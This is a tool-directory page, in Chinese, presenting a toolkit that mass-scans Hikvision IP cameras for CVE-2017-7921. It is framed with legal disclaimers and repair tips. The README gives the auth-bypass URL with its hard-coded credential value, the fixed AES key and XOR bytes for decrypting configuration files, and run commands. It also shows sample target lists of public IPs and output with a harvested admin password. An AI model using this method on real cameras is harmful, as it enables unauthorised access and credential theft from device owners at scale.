Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-7921-Research-Toolkit — Used to quickly test the Hikvision CVE-2017-7921 vulnerability with FOFA, and provide the login account and password, and output a JSON file. | Kitploit
工具/GitHubGitHub/wyl-cmd/cve-2017-7921-research-toolkit
漏洞扫描器加密/解密工具物联网安全漏洞利用Web应用程序漏洞利用信息收集
GitHubwyl-cmd/cve-2017-7921-research-toolkit

CVE-2017-7921-Research-Toolkit

Used to quickly test the Hikvision CVE-2017-7921 vulnerability with FOFA, and provide the login account and password, and output a JSON file.

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
5161个月前尚未审核
分享

CVE-2017-7921 Research Toolkit

安全声明:本工具仅供授权安全研究与漏洞验证使用

目录

  • 法律与道德声明
  • 项目描述
  • 功能特性
  • 安装说明
  • 使用方法
  • 输出结果
  • 防御与修复建议
  • 技术细节
  • 致谢

⚖️ 法律与道德声明

重要提示:使用本工具即表示您同意以下条款

  • 仅限授权测试:仅用于您拥有明确书面授权的系统
  • 遵守法律:严格遵守《网络安全法》及所在地相关法律法规
  • 负责任披露:发现漏洞请通过官方渠道报告厂商
  • 教育目的:本工具旨在提升物联网安全意识
  • 后果自负:滥用本工具造成的法律后果由使用者自行承担

本项目遵循 GitHub 安全研究政策 及 海康威视安全响应中心 的披露规范。


📖 项目描述

针对海康威视IP摄像头 CVE-2017-7921 身份验证绕过漏洞的批量检测与验证工具,支持配置文件的自动解密与凭证提取。

设计目标

  • 帮助安全研究人员评估大规模设备的安全状态
  • 为设备所有者提供自检能力
  • 支持生成修复建议报告
  • 推动物联网设备安全升级

  • ✨ 功能特性

    • ✅ 批量扫描JSON格式设备列表
    • ✅ 多线程并发检测(可配置线程数)
    • ✅ 自动下载加密的配置文件
    • ✅ 实时解密并提取登录凭据
    • ✅ 扫描进度实时显示(tqdm)
    • ✅ 结果自动保存为JSON报告
    • ✅ 支持中断后继续扫描

    🛠️ 安装说明

    环境要求

    • Python 3.7 或更高版本
    • 仅支持 Linux / macOS(Windows 下部分功能受限)

    依赖安装

    root@kitploit:~
    git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
    cd CVE-2017-7921-Research-Toolkit
    pip install -r requirements.txt
    

    requirements.txt 内容

    root@kitploit:~
    requests>=2.28.0
    pycryptodome>=3.15.0
    tqdm>=4.64.0
    

    📊 使用方法

    1. 准备设备数据文件

    在工具目录下创建 zc/ 文件夹,将设备列表以JSON格式放入(每行一个设备对象):

    root@kitploit:~
    mkdir zc
    

    文件示例: devices_2025.json

    root@kitploit:~
    {"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
    {"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}
    

    字段说明:

    字段说明必需
    link设备HTTP/HTTPS访问地址✅ 是
    city城市信息❌ 否
    country国家代码❌ 否
    org组织/ISP信息❌ 否

    2. 运行扫描工具

    root@kitploit:~
    python batch_decrypt.py
    

    3. 交互式操作示例

    root@kitploit:~
    ════════════════════════════════════════════════════════════════════════════════
    海康威视摄像头配置文件漏洞批量扫描工具
    ════════════════════════════════════════════════════════════════════════════════
    
    可用的JSON文件:
    ════════════════════════════════════════════════════════════════════════════════
    1. devices_2025.json (45,678 字节)
    ════════════════════════════════════════════════════════════════════════════════
    
    请选择文件编号: 1
    已选择文件: devices_2025.json
    正在加载设备数据...
    
    待扫描设备总数: 2000
    请输入并发线程数 (默认: 5): 10
    并发线程数: 10
    开始扫描...
    
    已扫描设备总数: 2000
    发现漏洞设备数: 127
    
    漏洞设备已保存到: vulnerable_devices.json
    

    📁 输出结果

    扫描完成后生成 vulnerable_devices.json,包含所有存在漏洞的设备信息。

    示例输出:

    root@kitploit:~
    [
      {
        "url": "http://109.50.152.186",
        "config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
        "username": "admin",
        "password": "123456",
        "city": "Lisbon",
        "country": "PT",
        "org": "ISP Telecom",
        "status": "success"
      }
    ]
    

    🛡️ 防御与修复建议

    对于设备所有者

    1. 立即升级固件:访问 海康威视官网 下载最新版本
    2. 修改默认密码:即使已升级,也应更改默认admin密码
    3. 网络隔离:将摄像头部署在独立VLAN,禁止公网直接访问
    4. 启用IP白名单:仅允许可信IP访问管理接口

    对于安全从业者

    1. 扫描结果保密:不得泄露未修复设备的详细信息
    2. 协助修复:主动联系设备所有者提供技术支持
    3. 合规报告:生成符合ISO 27001标准的安全评估报告

    🔬 技术细节

    漏洞原理

    • 认证绕过:/System/configurationFile?auth=YWRtaW46MTEK 使用硬编码凭证
    • 弱加密:配置文件采用固定AES-ECB密钥加密
    • 密钥泄露:密钥 279977f62f6cfd2d91cd75b889ce0c9a 硬编码在固件中

    加密流程

    1. 获取加密的二进制配置文件
    2. AES-ECB解密(去除首块)
    3. XOR混淆(密钥:0x73, 0x8B, 0x55, 0x44)
    4. 正则提取admin账号和后续密码字段

    📝 许可证

    本软件仅供授权安全研究和教育用途。使用者应自行确保符合所有适用法律。


    🙏 致谢

    • 感谢海康威视及时响应并发布固件更新
    • 感谢开源社区提供的漏洞分析资料
    • 本项目遵循 IoT安全研究最佳实践

    最后更新:2025-01-29 | 版本:v1.0.0 | 支持CVE:CVE-2017-7921

    下载工具